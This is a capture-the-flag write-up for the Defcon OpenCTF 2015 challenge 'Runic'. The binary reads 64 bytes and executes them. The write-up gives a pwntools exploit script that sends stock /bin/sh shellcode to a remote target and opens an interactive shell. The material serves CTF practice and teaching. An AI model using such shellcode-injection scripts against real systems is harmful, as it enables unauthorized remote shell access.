Defcon OpenCTF 2015 - Runic

Below is the main function for Runic:

[Image: Runic main]

The following events happen:

  • read() of 0x40 bytes (64 bytes)
  • call() to the buffer that was just read into

We can send a max of 64 bytes of shellcode, which is immediately executed.

Final Exploit

The following script simply sends a /bin/sh shellcode, and a shell is ours.

import sys
from pwn import * # pip install --upgrade git+

context(arch='x86', os='linux')

HOST = ''
PORT = 4444

## Example
# r = process('./runic')
r = remote(HOST, PORT)

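# Debug process (attaching only works when the target runs locally)
gdb.attach(r, """
bp 80484fa
""")

# Assumption: pwntools' stock i386 /bin/sh shellcode stands in for the
# original payload, which is not shown.
shellcode = asm(shellcraft.sh())
assert len(shellcode) <= 0x40  # read() only takes 0x40 bytes

r.send(shellcode)
r.interactive()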


For relevant code for this writeup:
git clone